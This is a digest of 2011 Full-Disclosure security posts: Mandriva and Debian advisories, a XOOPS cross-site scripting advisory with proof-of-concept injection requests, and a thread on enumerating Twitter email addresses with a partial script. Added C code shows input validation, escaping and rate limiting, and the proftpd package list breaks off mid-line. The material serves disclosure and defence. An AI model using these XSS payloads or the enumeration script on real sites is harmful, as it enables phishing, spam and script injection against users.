[Full-disclosure] [ MDVSA-2011:047 ] proftpd
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

___

 Mandriva Linux Security Advisory                         MDVSA-2011:047
 http://www.mandriva.com/security/
___

 Package : proftpd
 Date    : March 18, 2011
 Affected: 2010.0, 2010.1
___

 Problem Description:

 A vulnerability was discovered and corrected in proftpd:

 Integer overflow in the mod_sftp (aka SFTP) module in ProFTPD 1.3.3d
 and earlier allows remote attackers to cause a denial of service
 (memory consumption leading to OOM kill) via a malformed SSH message
 (CVE-2011-1137).

 Additionally for Mandriva Linux 2010.0 proftpd was upgraded to the
 same version as in Mandriva Linux 2010.2.

 The updated packages have been patched to correct this issue.
___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1137
___

 Updated Packages:

 Mandriva Linux 2010.0:
 8e491a641c66bfd2233376fc5c79c3ae  2010.0/i586/proftpd-1.3.3-0.1mdv2010.0.i586.rpm
 4456b728c212a896862828d86eb6f3ef  2010.0/i586/proftpd-devel-1.3.3-0.1mdv2010.0.i586.rpm
 001e46cc5f36ba64c9ae20d1ba4c4801  2010.0/i586/proftpd-mod_autohost-1.3.3-0.1mdv2010.0.i586.rpm
 a3bebc84c79fc1e011187cb743ec901e  2010.0/i586/proftpd-mod_ban-1.3.3-0.1mdv2010.0.i586.rpm
 5792da80041ca987653271bc927e8e48  2010.0/i586/proftpd-mod_case-1.3.3-0.1mdv2010.0.i586.rpm
 d9546d0b534932554a415dad8eda61e4  2010.0/i586/proftpd-mod_ctrls_admin-1.3.3-0.1mdv2010.0.i586.rpm
 67fca9fe7447a7b71ea380b56e4d6dbb  2010.0/i586/proftpd-mod_gss-1.3.3-0.1mdv2010.0.i586.rpm
 9682701d0dc44de6ae8823f3b751f2a3  2010.0/i586/proftpd-mod_ifsession-1.3.3-0.1mdv2010.0.i586.rpm
 375fe3abc5ed0c8ed59216a15b54817d  2010.0/i586/proftpd-mod_ldap-1.3.3-0.1mdv2010.0.i586.rpm
 21b9fbab449567331679a4582cf2299f  2010.0/i586/proftpd-mod_load-1.3.3-0.1mdv2010.0.i586.rpm
 3ddacfaa23963c922e2ba3ce1e75d398  2010.0/i586/proftpd-mod_quotatab-1.3.3-0.1mdv2010.0.i586.rpm
 74e71e1de83accce2c55857768c5f034  2010.0/i586/proftpd-mod_quotatab_file-1.3.3-0.1mdv2010.0.i586.rpm
 1a671f16b84f12fb65ec2452868561eb  2010.0/i586/proftpd-mod_quotatab_ldap-1.3.3-0.1mdv2010.0.i586.rpm
 effc2ceebc34839377f8faa9b992d5a2  2010.0/i586/proftpd-mod_quotatab_radius-1.3.3-0.1mdv2010.0.i586.rpm
 9c9f0a8bba8de8dfe52e5418adae37d7  2010.0/i586/proftpd-mod_quotatab_sql-1.3.3-0.1mdv2010.0.i586.rpm
 36b793ff943513dafedb1cf4fb950623  2010.0/i586/proftpd-mod_radius-1.3.3-0.1mdv2010.0.i586.rpm
 65413a1eb94c91f729c9569e79df6b11  2010.0/i586/proftpd-mod_ratio-1.3.3-0.1mdv2010.0.i586.rpm
 f7e94d2c4b3a707ac74c3c7a0dec7026  2010.0/i586/proftpd-mod_rewrite-1.3.3-0.1mdv2010.0.i586.rpm
 4ca434ff1754ef12561607d5edd9a22f  2010.0/i586/proftpd-mod_sftp-1.3.3-0.1mdv2010.0.i586.rpm
 f2e73feb4cb1e23c78043469b2517a2c  2010.0/i586/proftpd-mod_shaper-1.3.3-0.1mdv2010.0.i586.rpm
 d628bee7746f0c583436f06c3d87a3ce  2010.0/i586/proftpd-mod_site_misc-1.3.3-0.1mdv2010.0.i586.rpm
 10c1949441e8995a6cfd29115b2d1eca  2010.0/i586/proftpd-mod_sql-1.3.3-0.1mdv2010.0.i586.rpm
 a0797d6f775a3594981b1445fbbf3f2b  2010.0/i586/proftpd-mod_sql_mysql-1.3.3-0.1mdv2010.0.i586.rpm
 b0b9c84cd77dcb2acafb196b8a98d9d7  2010.0/i586/proftpd-mod_sql_postgres-1.3.3-0.1mdv2010.0.i586.rpm
 45d41896bd0ca0bb0d824c032f461dd3  2010.0/i586/proftpd-mod_time-1.3.3-0.1mdv2010.0.i586.rpm
 25a1af43cbcb4aa74391f0a3a2b339f8  2010.0/i586/proftpd-mod_tls-1.3.3-0.1mdv2010.0.i586.rpm
 226cf260eb3d6460c071b4b7c0f074a7  2010.0/i586/proftpd-mod_vroot-1.3.3-0.1mdv2010.0.i586.rpm
 f528d0ff77b7a9ffd5f5733db64bb676  2010.0/i586/proftpd-mod_wrap-1.3.3-0.1mdv2010.0.i586.rpm
 aa1d74b81a020c4463385babc0c99a2f  2010.0/i586/proftpd-mod_wrap_file-1.3.3-0.1mdv2010.0.i586.rpm
 d5c34155b8267f4b7ebd490a790637c3  2010.0/i586/proftpd-mod_wrap_sql-1.3.3-0.1mdv2010.0.i586.rpm
 ba10d155a3f958e5d07b08aa2d242a1e  2010.0/SRPMS/proftpd-1.3.3-0.1mdv2010.0.src.rpm

 Mandriva Linux 2010.0/X86_64:
 21e5304dbfaba0456df4fcdf07c6146f  2010.0/x86_64/proftpd-1.3.3-0.1mdv2010.0.x86_64.rpm
 bf81f5f838416e8ad6be026c72b96d77  2010.0/x86_64/proftpd-devel-1.3.3-0.1mdv2010.0.x86_64.rpm
 99ac6d0ca6b7325a9d037c04c337d9cf  2010.0/x86_64/proftpd-mod_autohost-1.3.3-0.1mdv2010.0.x86_64.rpm
 3bffd5be09b9042c4da02a6ec51191d1  2010.0/x86_64/proftpd-mod_ban-1.3.3-0.1mdv2010.0.x86_64.rpm
 4f945c34baf41cd0955932a1dc616c6a  2010.0/x86_64/proftpd-mod_case-1.3.3-0.1mdv2010.0.x86_64.rpm
 6822a142ddcdb057f66c2e76652e860d  2010.0/x86_64/proftpd-mod_ctrls_admin-1.3.3-0.1mdv2010.0.x86_64.rpm
 47785c7468636e0e3a0bc232b23ad760  2010.0/x86_64/proftpd-mod_gss-1.3.3-0.1mdv2010.0.x86_64.rpm
 317a739c1cfd6d6675b7bb03c030d3fb  2010.0/x86_64/proftpd-mod_ifsession-1.3.3-0.1mdv2010.0.x86_64.rpm
 e1360da80add4ce853070dc967bdd2d1
[Full-disclosure] XOOPS 2.5.0 <= Cross Site Scripting Vulnerability
XOOPS 2.5.0 <= Cross Site Scripting Vulnerability

1. OVERVIEW

The XOOPS 2.5.0 and lower versions were vulnerable to Cross Site Scripting.

2. BACKGROUND

XOOPS is an acronym of eXtensible Object Oriented Portal System. It's the
#1 Content Management System (CMS) project on www.sourceforge.net and a
recipient of several awards, and constantly places as finalist in various
CMS and Open Source competitions. It incorporates many modules such as
forums, photo galleries, calendars, article management etc.

3. VULNERABILITY DESCRIPTION

Several parameters such as module/module[], memberslist_id[], newname[],
oldname[] were not properly sanitized upon submission to the
/modules/system/admin.php url, which allows an attacker to conduct a Cross
Site Scripting attack. This may allow an attacker to create a specially
crafted URL that would execute arbitrary script code in a victim's browser.

4. VERSIONS AFFECTED

XOOPS 2.5.0 and lower

5. PROOF-OF-CONCEPT/EXPLOIT

Parameter: module

http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin&op=install&module=pm%3Cimg%20src=a%20onerror=alert%28String.fromCharCode%2888,83,83%29%29%3Eaawe

Parameter: module[]

[REQUEST]
POST /xoops/modules/system/admin.php HTTP/1.1
Host: attacker.in
Connection: close
Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin
Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af; xoops_user=1-549115432fcb56150b18bef08004f77d;
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

op=confirm&module%5b%5d=1<script>alert(1)</script>&submit=Submit&oldname%5b1%5d=System&fct=modulesadmin&newname%5b1%5d=System
[/REQUEST]

Parameter: memberslist_id[]

[REQUEST]
POST /xoops/modules/system/admin.php HTTP/1.1
Host: attacker.in
Connection: close
Referer: http://attacker.in/xoops/modules/system/admin.php?fct=users&selgroups=2
Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af; xoops_user=1-549115432fcb56150b18bef08004f77d;
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

memberslist_id%5b%5d=<script>alert(1)</script>&op=action_group&Submit=&selgroups=1&fct=mailusers&edit_group=add_group
[/REQUEST]

Parameter: newname[]

[REQUEST]
POST /xoops/modules/system/admin.php HTTP/1.1
Host: attacker.in
Connection: close
Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin
Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af; xoops_user=1-549115432fcb56150b18bef08004f77d;
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

op=confirm&module%5b%5d=1&submit=Submit&oldname%5b1%5d=System&fct=modulesadmin&newname%5b1%5d=System<script>alert(1)</script>
[/REQUEST]

Parameter: oldname[]

[REQUEST]
POST /xoops/modules/system/admin.php HTTP/1.1
Host: attacker.in
Connection: close
Referer: http://attacker.in/xoops/modules/system/admin.php?fct=modulesadmin
Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af; xoops_user=1-549115432fcb56150b18bef08004f77d;
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

op=confirm&module%5b%5d=1&submit=Submit&oldname%5b1%5d=System<script>alert(1)</script>1bf8581e3dc&fct=modulesadmin&newname%5b1%5d=System
[/REQUEST]

6. SOLUTION

Upgrade to XOOPS 2.5.1 or higher

7. VENDOR

XOOPS Development Team
http://xoops.org

8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN
Ethical Hacker Group, Myanmar.

9. DISCLOSURE TIME-LINE

2011-03-10: notified vendor
2011-03-16: vendor released fixed version
2011-03-18: vulnerability disclosed

10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[xoops_2.5.0]_cross_site_scripting
Vendor Announcement:
http://xoops.org/modules/news/article.php?storyid=5851
What XSS Can Do:
http://yehg.net/lab/pr0js/view.php/What%20XSS%20Can%20Do.pdf
XSS FAQs:
http://www.cgisecurity.com/articles/xss-faq.shtml
XSS (wiki):
http://en.wikipedia.org/wiki/Cross-site_scripting
XSS (owasp):
http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
OWASP Top 10:
http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
CWE-79:
http://cwe.mitre.org/data/definitions/79.html

#yehg [2011-03-18]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
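The defect class in the advisory above is a parameter that is accepted without validation and then echoed into the admin page without encoding. The two layers that close it are an allowlist check on what a module name may contain and HTML-encoding of anything reflected. The C program below is an added example written for this page; it is not XOOPS code (XOOPS is PHP, where htmlspecialchars() does the encoding step), and the identifier rule for module names is an assumption chosen for the example.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <stddef.h>

/* Allowlist check for a module name. XOOPS module directory names are plain
 * identifiers, so this example rejects anything outside [A-Za-z0-9_] before
 * the value is used at all. (Policy assumed for the example, not XOOPS's.) */
int is_valid_module_name(const char *s)
{
    size_t n = strlen(s);
    if (n == 0 || n > 64) return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (!(isalnum(c) || c == '_')) return 0;
    }
    return 1;
}

/* Encode a string for an HTML text or double-quoted attribute context.
 * Returns the number of bytes written (excluding the NUL), or -1 when
 * `out` is too small; the caller never gets a truncated, half-encoded value. */
int html_escape(const char *in, char *out, size_t outlen)
{
    size_t pos = 0;
    for (; *in; in++) {
        const char *rep;
        char one[2] = { *in, 0 };
        switch (*in) {
        case '&':  rep = "&amp;";  break;
        case '<':  rep = "&lt;";   break;
        case '>':  rep = "&gt;";   break;
        case '"':  rep = "&quot;"; break;
        case '\'': rep = "&#39;";  break;
        default:   rep = one;      break;
        }
        size_t rl = strlen(rep);
        if (pos + rl + 1 > outlen) return -1;   /* keep room for the NUL */
        memcpy(out + pos, rep, rl);
        pos += rl;
    }
    out[pos] = 0;
    return (int)pos;
}

int main(void)
{
    /* Constructed inputs shaped like the advisory's payloads. */
    const char *samples[] = {
        "pm",
        "pm<img src=a onerror=alert(1)>",
        "1<script>alert(1)</script>",
    };
    char buf[256];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        int ok = is_valid_module_name(samples[i]);
        html_escape(samples[i], buf, sizeof buf);
        printf("%-34s valid=%d escaped=%s\n", samples[i], ok, buf);
    }
    return 0;
}
```

Validation alone is the right answer for `module`, which only ever names a directory; encoding is the answer for `oldname[]`/`newname[]`, which are free text that legitimately gets displayed back. Applying both means a bypass of one still leaves the other in place.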
[Full-disclosure] [ MDVSA-2011:048 ] krb5
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

___

 Mandriva Linux Security Advisory                         MDVSA-2011:048
 http://www.mandriva.com/security/
___

 Package : krb5
 Date    : March 18, 2011
 Affected: 2010.1, Enterprise Server 5.0
___

 Problem Description:

 A vulnerability was discovered and corrected in krb5:

 The MIT Kerberos 5 Key Distribution Center (KDC) daemon is vulnerable
 to a double-free condition if the Public Key Cryptography for Initial
 Authentication (PKINIT) capability is enabled, resulting in daemon
 crash or arbitrary code execution (which is believed to be difficult)
 (CVE-2011-0284).

 The updated packages have been patched to correct this issue.
___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0284
 http://web.mit.edu/kerberos/www/advisories/MITKRB5-SA-2011-003.txt
___

 Updated Packages:

 Mandriva Linux 2010.1:
 89a5146c09e531a05db7839dedb0a339  2010.1/i586/krb5-1.8.1-5.4mdv2010.2.i586.rpm
 a4fbd4e66104d0b025ca5af74042f21a  2010.1/i586/krb5-pkinit-openssl-1.8.1-5.4mdv2010.2.i586.rpm
 52d37491abb6044371064e031e3f782c  2010.1/i586/krb5-server-1.8.1-5.4mdv2010.2.i586.rpm
 6420550804a52d0cc7602b0d6ce43dd9  2010.1/i586/krb5-server-ldap-1.8.1-5.4mdv2010.2.i586.rpm
 a272a19cb39e01caa81f076e98e77b18  2010.1/i586/krb5-workstation-1.8.1-5.4mdv2010.2.i586.rpm
 9f1c62745a31910be6574d41b513fff9  2010.1/i586/libkrb53-1.8.1-5.4mdv2010.2.i586.rpm
 d3f252a3ee7c998fb475e8c847568f64  2010.1/i586/libkrb53-devel-1.8.1-5.4mdv2010.2.i586.rpm
 2148b8ff4cb03a84b7394a09ce8e374c  2010.1/SRPMS/krb5-1.8.1-5.4mdv2010.2.src.rpm

 Mandriva Linux 2010.1/X86_64:
 5fb7896e15aabb6413b5a4a8eb389de2  2010.1/x86_64/krb5-1.8.1-5.4mdv2010.2.x86_64.rpm
 87a70bdae97ff07485761ef2825f9af9  2010.1/x86_64/krb5-pkinit-openssl-1.8.1-5.4mdv2010.2.x86_64.rpm
 8b533208a389cdc53ef1c7ae175441a7  2010.1/x86_64/krb5-server-1.8.1-5.4mdv2010.2.x86_64.rpm
 bc1962507833f15e4dff3f02b3827caa  2010.1/x86_64/krb5-server-ldap-1.8.1-5.4mdv2010.2.x86_64.rpm
 b1592aca21fa62525b3ee0d47eca9359  2010.1/x86_64/krb5-workstation-1.8.1-5.4mdv2010.2.x86_64.rpm
 6007c476bbe0ed6b77157d01bc71fd56  2010.1/x86_64/lib64krb53-1.8.1-5.4mdv2010.2.x86_64.rpm
 3855f3d0ab75f54ebf4dc05f42efed3c  2010.1/x86_64/lib64krb53-devel-1.8.1-5.4mdv2010.2.x86_64.rpm
 2148b8ff4cb03a84b7394a09ce8e374c  2010.1/SRPMS/krb5-1.8.1-5.4mdv2010.2.src.rpm

 Mandriva Enterprise Server 5:
 99f05c23d6049230037ab6fef72b61c2  mes5/i586/krb5-1.8.1-0.5mdvmes5.2.i586.rpm
 23bdfb95ae19f56fc5e719cc1a480260  mes5/i586/krb5-pkinit-openssl-1.8.1-0.5mdvmes5.2.i586.rpm
 848f15a20fa86057cfdbe2b60c095987  mes5/i586/krb5-server-1.8.1-0.5mdvmes5.2.i586.rpm
 485c559ae048ba13e50950b3868a7946  mes5/i586/krb5-server-ldap-1.8.1-0.5mdvmes5.2.i586.rpm
 534efaed5cc1a76d53277ac07d7759b4  mes5/i586/krb5-workstation-1.8.1-0.5mdvmes5.2.i586.rpm
 93411c0c22cf9d0346b0d3bc8f032db4  mes5/i586/libkrb53-1.8.1-0.5mdvmes5.2.i586.rpm
 b40b3bca351d0468893c30dc42174c4c  mes5/i586/libkrb53-devel-1.8.1-0.5mdvmes5.2.i586.rpm
 79c72436e944990111e6a801166c06b6  mes5/SRPMS/krb5-1.8.1-0.5mdvmes5.2.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 53eb81cf4d662f16fef45c6c89a48bbb  mes5/x86_64/krb5-1.8.1-0.5mdvmes5.2.x86_64.rpm
 ae27d729c6a9fd714aaed4ad3692d72d  mes5/x86_64/krb5-pkinit-openssl-1.8.1-0.5mdvmes5.2.x86_64.rpm
 eff836f154bf1364b5b10be1c80e1373  mes5/x86_64/krb5-server-1.8.1-0.5mdvmes5.2.x86_64.rpm
 f22c47a5a4127a1ebb6dcf4e3d8ae8b8  mes5/x86_64/krb5-server-ldap-1.8.1-0.5mdvmes5.2.x86_64.rpm
 159e5d962bbb0614fcdeaebd3df3575e  mes5/x86_64/krb5-workstation-1.8.1-0.5mdvmes5.2.x86_64.rpm
 ad752198fef0ad908eb3e436dec68e82  mes5/x86_64/lib64krb53-1.8.1-0.5mdvmes5.2.x86_64.rpm
 80d6aa2d81a91e36ba81725e511b850c  mes5/x86_64/lib64krb53-devel-1.8.1-0.5mdvmes5.2.x86_64.rpm
 79c72436e944990111e6a801166c06b6  mes5/SRPMS/krb5-1.8.1-0.5mdvmes5.2.src.rpm
___

 To upgrade automatically use MandrivaUpdate or urpmi. The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security. You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
___

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
[Full-disclosure] [SECURITY] [DSA 2192-1] chromium-browser security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-2192-1                   secur...@debian.org
http://www.debian.org/security/                         Giuseppe Iuculano
March 15, 2011                         http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : chromium-browser
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2011-0779 CVE-2011-1290

Several vulnerabilities were discovered in the Chromium browser. The
Common Vulnerabilities and Exposures project identifies the following
problems:

CVE-2011-0779

   Google Chrome before 9.0.597.84 does not properly handle a missing key
   in an extension, which allows remote attackers to cause a denial of
   service (application crash) via a crafted extension.

CVE-2011-1290

   Integer overflow in WebKit allows remote attackers to execute arbitrary
   code via unknown vectors, as demonstrated by Vincenzo Iozzo, Willem
   Pinckaers, and Ralf-Philipp Weinmann during a Pwn2Own competition at
   CanSecWest 2011.

For the stable distribution (squeeze), these problems have been fixed in
version 6.0.472.63~r59945-5+squeeze4

For the testing distribution (wheezy), these problems will be fixed soon.

For the unstable distribution (sid), these problems have been fixed in
version 10.0.648.133~r77742-1

We recommend that you upgrade your chromium-browser packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)

iEYEARECAAYFAk1/lHMACgkQNxpp46476ao/EwCdFThT2dtAQ9HB8yza9Z4gIqV4
FeIAn3zISoa/86EhpLs5qjhMB9gQ6Oc0
=QJZP
-----END PGP SIGNATURE-----
[Full-disclosure] [SECURITY] [DSA 2193-1] libcgroup security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-2193-1                   secur...@debian.org
http://www.debian.org/security/                           Thijs Kinkhorst
March 16, 2011                         http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : libcgroup
Vulnerability  : several
Problem type   : local
Debian-specific: no
CVE ID         : CVE-2011-1006 CVE-2011-1022
Debian Bug     : 615987

Several issues have been discovered in libcgroup, a library to control
and monitor control groups:

CVE-2011-1006

   Heap-based buffer overflow by converting list of controllers for given
   task into an array of strings could lead to privilege escalation by a
   local attacker.

CVE-2011-1022

   libcgroup did not properly check the origin of Netlink messages,
   allowing a local attacker to send crafted Netlink messages which could
   lead to privilege escalation.

The oldstable distribution (lenny) does not contain libcgroup packages.

For the stable distribution (squeeze), this problem has been fixed in
version 0.36.2-3+squeeze1.

For the testing distribution (wheezy) and unstable distribution (sid),
this problem will be fixed soon.

We recommend that you upgrade your libcgroup packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iQEcBAEBAgAGBQJNgSa1AAoJEOxfUAG2iX577XUIAJP6D0PL63DYGPQCuOafRPF/
dIrmXVLztDsor2GmhkgNl1O7bDjAZ1I/TN/pjSjqZaRWUYCyNeUmk62+t+6PlZCz
KEZgz92s6k0EzjEYSZw84hyaxp15neqwlGYxpX1cfOcpZEV2bN6+b9HEYoxZI2h5
fhBfFzVists0vquz15BoLMFEtjCPYODlPoc5zyZpmrAvLinl6xBzVJ6fHdDNB1yM
tyBJCgWQ/Iu+XY2ntP/oJjFQ62Ztig/J94u6C2ixvyYUiOsUgLJspddjAQN5YFyW
cgOEWnJhcqmWSPdyPuhblz/l4s2sR3ftPxnrxb0abtnPVJB41SO7h9PAc2UnRwU=
=Is0K
-----END PGP SIGNATURE-----
[Full-disclosure] [SECURITY] [DSA 2194-1] libvirt security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-2194-1                   secur...@debian.org
http://www.debian.org/security/                           Thijs Kinkhorst
March 18, 2011                         http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : libvirt
Vulnerability  : insufficient checks
Problem type   : local
Debian-specific: no
CVE ID         : CVE-2011-1146
Debian Bug     : 617773

It was discovered that libvirt, a library for interfacing with different
virtualization systems, did not properly check for read-only connections.
This allowed a local attacker to perform a denial of service (crash) or
possibly escalate privileges.

The oldstable distribution (lenny) is not affected by this problem.

For the stable distribution (squeeze), this problem has been fixed in
version 0.8.3-5+squeeze1.

For the testing distribution (wheezy), this problem will be fixed soon.

For the unstable distribution (sid), this problem has been fixed in
version 0.8.8-3.

We recommend that you upgrade your libvirt packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iQEcBAEBAgAGBQJNgw2+AAoJEOxfUAG2iX57AyEIAIKiPeyIGmkNf9ghME6ZylBl
sOnwF/Y4BfDbOQjlEzT/TXYOXoNSzBqrwUZyuk0N5gkuAWdwqSZv8NW+dMFtJtqx
GTdxdQAnahwsKoFKjTGd+C+u1lew1SnjuaTD8fAPyONTXimdasz0JGkJCflnkYe1
LQ4zUFxmDphgdLB+dl2IJedG8j4NAAxHz407oY8wEkie4VwWo1O/YZlOyo5ZBkDl
BKync5ecQx5TDEI8q+6BWmucUiapn9Dt1JLVzDjFy2WT6SjGbqGeJ/69tOALk6Sz
iFyhL0UoxdoQ90fWV1FHGAgG+yypklRqZIQq3e3lUGxU3eQRHDil37zpJokAvl4=
=0RVC
-----END PGP SIGNATURE-----
Re: [Full-disclosure] Using Twitter for Phishing Campaign / Spam / Followers?
This conceptual flaw exists in most web apps which have a reset password
by email address feature, as most will display an error if the email
address does not exist in their database.

On Tue, Mar 15, 2011 at 12:19 PM, Reverse Skills <cont...@reverseskills.com> wrote:

> Simple and easy way to get a list of email accounts used on Twitter.
> For Phishing campaigns, custom Spam...
>
> Twitter has been notified and I suppose someday it will be fixed if they
> think there should be filtering.
>
> When you create a new Twitter account, the form requests a mailing
> address. Twitter verifies that the email account is not being used, but
> does not check any user token or limit the usage (captcha/block).
>
> https://twitter.com/signup -> http://twitter.com/users/email_available?email=
>
> We just need to automate it with a simple script,
> ***Everything you do will be your responsibility***
>
> ---
> #!/usr/bin/python
> import sys, json, urllib2, os
> f = urllib2.urlopen("http://twitter.com/users/email_available?email=" + sys.argv[1])
> data = json.load(f)
> def valid()
>  .. "Email has already been taken" in data["msg"] --> reply ..
> ---
>
> We just need a list of users to test.. for example:
> http://twitter.com/about/employees (don't be evil is just an example!)
>
> Parsing the name/nickname and testing the {user}@twitter.com, a few
> minutes later we have a list of ~ 400 valid internal email
> *@twitter.com.
>
> An attacker could probably.. a brute force attack (Google Apps), would
> send Phishing or try to exploit some browser bugs or similar. #Aurora
> #Google. Most of these e-mail are internal, not public..
>
> There are also some that make you think they are used for such
> A-Directory system users:
>
> ..
> apa...@twitter.com
> r...@twitter.com
> m...@twitter.com
> ..
>
> But, if you download a database Rockyou / Singles.org / Gawker /
> Rootkit.com or just typical dictionaries and domains, it will be quite
> easy to get hold of a list of users large enough (*@hotmail.com,
> *@gmail.com, etc). For example in my case I used it to find user
> accounts in a pentest of a company that used Twitter.
>
> But probably not a good idea to allow unlimited access, a malicious
> user could use these user lists for Spam or Phishing.
>
> --
> Security Researcher
> http://twitter.com/revskills
> --
Re: [Full-disclosure] Using Twitter for Phishing Campaign / Spam / Followers?
Agreed. These public API methods should have brute force protection at
the very least. But, because they want instant in-line form validation
for email address availability, this makes it difficult.

In an ideal world, they'd have a CAPTCHA on the form, and only validate
upon submit with a valid captcha.

On Tue, Mar 15, 2011 at 3:02 PM, Reverse Skills <cont...@reverseskills.com> wrote:

> The problem is to allow unlimited access to that resource, not the
> resource itself.
>
> 2011/3/15 Cal Leeming <c...@foxwhisper.co.uk>:
>> This conceptual flaw exists in most web apps which have a reset password
>> by email address feature, as most will display an error if the email
>> address does not exist in their database.
>>
>> On Tue, Mar 15, 2011 at 12:19 PM, Reverse Skills <cont...@reverseskills.com> wrote:
>>> Simple and easy way to get a list of email accounts used on Twitter.
>>> For Phishing campaigns, custom Spam...
>>>
>>> Twitter has been notified and I suppose someday it will be fixed if they
>>> think there should be filtering.
>>>
>>> When you create a new Twitter account, the form requests a mailing
>>> address. Twitter verifies that the email account is not being used, but
>>> does not check any user token or limit the usage (captcha/block).
>>>
>>> https://twitter.com/signup -> http://twitter.com/users/email_available?email=
>>>
>>> We just need to automate it with a simple script,
>>> ***Everything you do will be your responsibility***
>>>
>>> ---
>>> #!/usr/bin/python
>>> import sys, json, urllib2, os
>>> f = urllib2.urlopen("http://twitter.com/users/email_available?email=" + sys.argv[1])
>>> data = json.load(f)
>>> def valid()
>>>  .. "Email has already been taken" in data["msg"] --> reply ..
>>> ---
>>>
>>> We just need a list of users to test.. for example:
>>> http://twitter.com/about/employees (don't be evil is just an example!)
>>>
>>> Parsing the name/nickname and testing the {user}@twitter.com, a few
>>> minutes later we have a list of ~ 400 valid internal email
>>> *@twitter.com.
>>>
>>> An attacker could probably.. a brute force attack (Google Apps), would
>>> send Phishing or try to exploit some browser bugs or similar. #Aurora
>>> #Google. Most of these e-mail are internal, not public..
>>>
>>> There are also some that make you think they are used for such
>>> A-Directory system users:
>>>
>>> ..
>>> apa...@twitter.com
>>> r...@twitter.com
>>> m...@twitter.com
>>> ..
>>>
>>> But, if you download a database Rockyou / Singles.org / Gawker /
>>> Rootkit.com or just typical dictionaries and domains, it will be quite
>>> easy to get hold of a list of users large enough (*@hotmail.com,
>>> *@gmail.com, etc). For example in my case I used it to find user
>>> accounts in a pentest of a company that used Twitter.
>>>
>>> But probably not a good idea to allow unlimited access, a malicious
>>> user could use these user lists for Spam or Phishing.
>>>
>>> --
>>> Security Researcher
>>> http://twitter.com/revskills
>>> --
>
> --
> Security Researcher
> http://twitter.com/revskills
> --
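The thread above agrees on the fix without showing one: the availability endpoint itself is fine, unlimited access to it is not. A per-client token bucket is the usual first layer (the CAPTCHA-on-submit idea is the second). The C program below is an added example written for this page, not Twitter's code; the client key, bucket size and refill rate are assumptions, and the replayed traffic is constructed to mirror the ~400-address script in the thread.

```c
#include <stdio.h>
#include <string.h>

/* Token-bucket limiter for a lookup endpoint such as /users/email_available.
 * Keyed by client (source IP or session id). The numbers are assumptions
 * chosen for the example, not any site's real settings. */
#define MAX_CLIENTS     64
#define BUCKET_CAPACITY 20.0    /* burst: 20 lookups before throttling starts   */
#define REFILL_PER_SEC  0.1     /* sustained: 6 lookups per minute per client   */

struct bucket {
    char   key[64];
    double tokens;
    double last;                /* time of the last refill, in seconds          */
};

static struct bucket table[MAX_CLIENTS];

/* Forget all clients (used between simulations). */
void rate_limit_reset(void)
{
    memset(table, 0, sizeof table);
}

static struct bucket *find_or_create(const char *key, double now)
{
    struct bucket *free_slot = NULL;
    for (int i = 0; i < MAX_CLIENTS; i++) {
        if (table[i].key[0] == '\0') {
            if (!free_slot) free_slot = &table[i];
        } else if (strcmp(table[i].key, key) == 0) {
            return &table[i];
        }
    }
    if (!free_slot) return NULL;                     /* table full */
    strncpy(free_slot->key, key, sizeof free_slot->key - 1);
    free_slot->key[sizeof free_slot->key - 1] = '\0';
    free_slot->tokens = BUCKET_CAPACITY;             /* new client: full bucket */
    free_slot->last   = now;
    return free_slot;
}

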